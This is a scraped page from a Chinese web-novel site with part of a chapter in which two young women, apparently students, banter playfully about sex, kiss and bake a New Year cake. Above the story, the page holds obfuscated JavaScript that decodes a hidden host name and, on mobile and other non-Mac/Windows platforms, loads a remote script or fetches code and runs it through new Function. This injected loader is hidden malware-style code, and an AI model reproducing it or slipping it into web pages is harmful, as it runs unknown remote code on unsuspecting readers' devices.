98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(74(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

孟璟听了,突然清醒了,啊地一声,搂着未婚妻一起坐起身来,然后跳起来去关火。

等她关完火回来,准备继续刚刚没做完的,只见未婚妻自己也给自己熄了火了,宝相庄严地坐在那儿翻书看呢。她跑过去,跪坐在她身旁,哎了一声老婆。

干嘛?宋若警惕地看她一眼。

干!鲸鱼双眼亮晶晶的。

宋若过了一分钟才懂她的梗,恨不得一巴掌甩她脸上。但还是忍耐地深呼吸了两下,拍拍她的肩,准备睡觉。

不,除非一起睡。鲸鱼理直气壮。

宋若瞪她一眼,别得寸进尺。

可是,刚刚没做完啊。孟璟十分不能理解,做人难道不是有始有终最重要。

什么歪理。宋若皱皱眉,不需要。

可是你爱我。为什么不能做嘛。人生苦短,及时行乐啊。鲸鱼要哭了。这就好比,到嘴边的甜点忽然不给你吃了,而这散发着诱人香甜的小点心还在你面前晃。隔壁小孩都馋哭了。何况是她。

宋若觉得这大鲸鱼就是这么魔性。明明按照剧情进展,现在她的处境是蒙着层阴影的。可是回过神来,两个人聊的这是啥玩意。什么做不做的。如此没有下线的话题,也只有孟璟才能郑重其事地探讨。

早点做的话,可以把技术练好嘛,我知道老婆体力差,我会慢慢来的,比如,今天先做十分钟啦。她还在说,关键是一脸清纯。

宋若扶着额头看一眼窗外,雪花纷飞,她真实地后悔,刚刚被鲸鱼所胁迫了。不该和她表白的。你看现在是不是惹得她发情了。

真等到二十岁再那个,会错过好多好时光。我觉得不划算。孟璟掰着手指头。

再说就扔出去。宋若指着窗外,雪地里会多出一个小画家。

噗。孟璟笑出声,威胁我?你舍不得的。

宋若干脆自己先起身,收拾了下小桌子,摇摇地往自己房间去。行,鲸大爷,惹不起,躲着你总行了吧。

然而孟璟不依不饶地追了上去,在门要关上的时候,伸出一只手挡住了,泪眼汪汪,不行不行。

怎么不行?宋若头疼。

我知道了,现在不做就不做嘛。亲我。不亲睡不着的。鲸鱼楚楚可怜的。鉴于她演技也是炉火纯青,宋若不知道她的这种可怜之中,真假各占几成。

但是为了息事宁人,低头在她嘴唇上轻轻啄了一啄,晚安。

房门轻轻掩上时,站在门口的孟璟,虽然鼻尖碰到了门板,心里却有些飘飘然的,还隐隐觉得闻到了一股香风。她头靠在门上,悄悄说晚安我也爱你。

第90章

宋若自来知道时光飞逝,但是这一年的小尾巴,尤其如此。

圣诞,元旦,期末考,杀青宴,春节,流水般地过去。

这一年的春节她们没有去姑姑家。孟璟其实不太愿意和孟姗姗那家人一起过节,透着别扭,又考虑到前一年曾经和梁小左许诺,会再带他玩,这两方面的原因,促使她提议陪未婚妻回南方几天,但在宋若的坚持下,留在了华市。

谁知孟老爷子让孟姗姗和谢琼都去谢家过年,他带着孟璟和宋若,三个人过了个温馨的除夕。宋若和孟璟包的饺子,里头塞了个硬币,寓意吃到这个的人,来年运道最旺,两个人心照不宣地避开那做了记号的饺子,最终让老爷子吃到了,这样大年纪的人了,也还是开心得合不拢嘴,一面又说我的好运都给你们。

除夕那天恰好是立春。

天气是还很冷,毕竟倒春寒也不是玩的。

可是郊外已经万物复苏,整个世界都是朦朦胧胧的,薄薄一层绿意。

宋若在春季对鲸鱼越发注意。

鲸鱼越来越黏糊了。

她什么都说。

宋若多数时候安静倾听。两辈子加起来,遇到的人之中,没有这么舍得交心的。

老婆,你看天边那朵云,像不像你给我的亲亲。

老婆,我做了好多个版本的职业性格测试,都有建议我做艺术家诶,我是不是该去学个画画的,毕竟我基础还可以。暴殄天物了啊啊啊。

老婆,这道题帮我看一下

老婆,楼下那家的戚风蛋糕不好吃。

于是宋若去盛雪堂兄最近新开的烘焙班学了一手,回来给她烤了个戚风蛋糕,当作给鲸鱼的新年礼物。

又怕她腻,所以泡了薄荷茶。

结局是被她抱着亲了十分钟。

房间温度都不对了,才算了局。

另外还烤了一个,我们拿回去给爷爷,好不好。宋若用哄小孩的语气问。

小孩的回答是凑过来亲一口,烙下一个蛋奶味的吻,撤回去继续吃。

鲸鱼算是一个很注重细节的人,平时吃外带的小点心,她多半一边吃一边翻书看,或者是玩手机。但是是老婆做的,她就吃得很专心了,颇有仪式感,吃之前还学动漫人物说个我开动了,拿小银勺挖一勺送进嘴里,慢慢品尝,唇角带着淡淡笑意。

宋若站在厨房的流理台后,从斜后方去观察鲸鱼。身形薄薄的。在剧组瘦得太狠了,过了个年,还是没能养回来。从正面看,和从这个角度看,鲸鱼给她的感觉完全不一样。从侧面看,就有点,过于沉静了。

孟璟想必是察觉到她的视线,扭过头来与她对视了一眼,微笑道偷看干嘛,我又不收钱,你来,想怎么看就怎么看。

宋若垂下睫毛,端起自己的薄荷茶喝了一口,杯子收进洗碗池里,再去打开烤箱,把另外一个蛋糕拿出来。

屋子里满溢的甜香倍加浓烈。

身后响起脚步声,孟璟过来了。

宋若将蛋糕放进自制的礼品纸盒,抬眼看看对面的鲸鱼,用眼神做了个问讯。

我老婆真厉害,什么都能做得这么棒。鲸鱼夸人的时候浅显直白,不会有半点拐弯抹角。然而这一次,宋若觉得她后面还有个但是。

但是,总是看着不怎么开心。心事重重的。孟璟蹙蹙眉,有什么问题,可以和我商量啊。

宋若把礼物盒子折起来,用宝蓝色丝带在上边打了个蝴蝶结,你最近好不好?

我好啊。孟璟笑了笑,你在我身边,我怎么能不好为什么这么问?

宋若点点头,我刚在想,艺考你不要陪我去了。

孟璟反应很大,那怎么行。你一个人。我说好寸步不离的嘛。

你在家陪着爷爷。我自己去就好了。

那也不差这一天两天啊。再说了你不知道,他可烦别人陪。

你没有这个奔波的必要,我不是一个人,不是还有助理吗。

那怎么一样。

宋若就不说话了,抬眼看着她。没有拧紧的水龙头吧嗒掉下一滴水。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间